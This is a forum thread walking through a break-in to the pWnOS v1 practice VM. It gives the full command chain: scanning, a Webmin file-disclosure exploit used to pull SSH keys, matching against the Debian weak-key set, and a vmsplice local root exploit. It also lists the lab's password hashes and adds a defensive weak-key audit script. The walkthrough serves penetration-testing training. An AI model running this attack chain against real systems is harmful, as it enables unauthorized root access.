Thread: [Video] Attacking - pWnOS

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    [Video] Attacking - pWnOS

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3388825
    Download video: http://www.mediafire.com/?65b0nursilwfyaf
    What is this?
    This is my walkthrough of how I broke into pWnOS v1.
    pWnOS is on a "VM Image" that creates a target on which to practice penetration testing; the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points.


    Scenario
    A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.
    It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t.


    What do I need?
    > BackTrack 4 (Final)
    > pWnOS.vmdk
    > exploit-db.com or milw0rm.


    Software
    Name: pWnOS
    Version: 1
    Home Page: http://0dayclub.com/files/pWnOS%20v1.0.zip
    Download Link:
    Forum/Support: http://forums.heorot.net/viewforum.php?f=21


    Commands:
    Code:
    nmap 192.168.3.1-255
    
    nmap -sV -sS -O 192.168.3.100
    
    firefox http://192.168.3.100
    
    firefox http://192.168.3.100:10000
    
    
    firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
    *Webmin <> save. Filename: shadow
    
    firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
    *Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
    http://milw0rm.com/exploits/5622        (perl)
    http://milw0rm.com/exploits/5720        (python)
    http://milw0rm.com/exploits/5632        (ruby)
    http://www.exploit-db.com/exploits/5622 (perl)
    http://www.exploit-db.com/exploits/5720 (python)
    http://www.exploit-db.com/exploits/5632 (ruby)
    
    wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
    
    perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
    perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
    perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
    perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
    
    tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
    
    cd rsa/2048
    
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
    *scans for the public key...*
    
    ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
    exit
    
    ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
    hostname
    uname -a
    
    firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
    *Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
    http://milw0rm.com/exploits/5092         (c)
    http://www.exploit-db.com/exploits/5092  (c)
    
    nano vmsplice.c
    
    gcc vmsplice.c -o vmsplice
    
    ./vmsplice
    
    whoami
    
    
    
    ----------------------------------------------------------------------------------------------------
    Users
    root:          root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
    vmware:        vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
    obama:         obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
    osama:         osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
    yomama:        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
    ----------------------------------------------------------------------------------------------------

    Notes:

    I had problems with the Debian OpenSSH/OpenSSL exploit: sometimes it would work, otherwise it would be really slow or just couldn't find the correct exploit file. The method which I use turns it into an offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path though!

    This is one method of getting in; the author did say that there are multiple ways in!

    It also took me a bit of work to get it to work with VirtualBox & static IP addresses.
    Read my post here (short answer - need to configure another interface via another OS)

    Song: Deadmau5 - Faxing Berlin
    Video length: 07:37
    Capture length: 14:55

    Blog Post: http://g0tmi1k.blogspot.com/2010/04/video-pwnos.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html#post9217 OR http://forums.heorot.net/viewtopic.php?f=21&t=391&p=1956#p1956
    Last edited by g0tmi1k; 03-05-2011 at 02:27 PM.
    Have you...g0tmi1k?
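
The defensive counterpart of the key-matching step in the post above, as an added example that is not part of the original post: it audits an authorized_keys file against a set of MD5 fingerprints of known-weak keys. The fingerprint set, the sample file and all function names are constructed for illustration; a real audit would load the fingerprints from a vendor-supplied weak-key list.

```python
import base64
import hashlib

KEY_TYPES = ("ssh-rsa", "ssh-dss")

def md5_fingerprint(b64_blob):
    """Hex MD5 of the decoded public-key blob, or None if it is not valid base64."""
    try:
        blob = base64.b64decode(b64_blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return hashlib.md5(blob).hexdigest()

def parse_authorized_keys(text):
    """Yield (line_no, b64_blob, comment) per key line; leading options are skipped."""
    for line_no, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        for i, field in enumerate(fields[:-1]):
            if field in KEY_TYPES:  # the blob is the token right after the key type
                yield line_no, fields[i + 1], " ".join(fields[i + 2:])
                break

def audit(text, weak_fingerprints):
    """Return (line_no, finding, comment) for weak or unparseable keys."""
    findings = []
    for line_no, blob, comment in parse_authorized_keys(text):
        fp = md5_fingerprint(blob)
        if fp is None:
            findings.append((line_no, "unparseable", comment))
        elif fp in weak_fingerprints:
            findings.append((line_no, fp, comment))
    return findings

# Constructed sample data: these blobs are placeholders, not real SSH keys.
WEAK_BLOB = base64.b64encode(b"constructed weak key blob").decode()
OK_BLOB = base64.b64encode(b"constructed strong key blob").decode()
SAMPLE = (
    "# constructed sample authorized_keys\n"
    f"ssh-rsa {WEAK_BLOB} user@host-a\n"
    f'command="uptime now" ssh-rsa {OK_BLOB} backup@host-b\n'
    "ssh-rsa not*base64 broken@host-c\n"
)
WEAK_FINGERPRINTS = {md5_fingerprint(WEAK_BLOB)}  # hypothetical blocklist

if __name__ == "__main__":
    for finding in audit(SAMPLE, WEAK_FINGERPRINTS):
        print(finding)
```

Any key flagged as weak has to be regenerated on a patched system and its old public key removed from every authorized_keys file that lists it.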

  2. #2
    Junior Member Shemsu-Hor's Avatar
    Join Date
    Aug 2009
    Posts
    93

    Re: [Video] Attacking - pWnOS

    Very nice ! Thanks

  3. #3
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    1

    Re: [Video] Attacking - pWnOS

    Thank you for all these videos.

    You have made a great job!!!

  4. #4
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    2

    Re: [Video] Attacking - pWnOS

    Amazing video. Really liked it. Thanks for the share

  5. #5
    Just burned his ISO hitasb's Avatar
    Join Date
    Aug 2010
    Location
    Usr
    Posts
    6

    Re: [Video] Attacking - pWnOS

    Ow nice, good job, thanks for sharing.

  6. #6
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] Attacking - pWnOS

    Quote: Originally posted by Shemsu-Hor
    Very nice ! Thanks

    Quote: Originally posted by jayp75
    Thank you for all these videos.
    You have made a great job!!!

    Quote: Originally posted by D4rk357
    Amazing video. Really liked it. Thanks for the share

    Quote: Originally posted by hitasb
    Ow nice, good job, thanks for sharing.

    Thanks for the thanks guys!
    Have you...g0tmi1k?
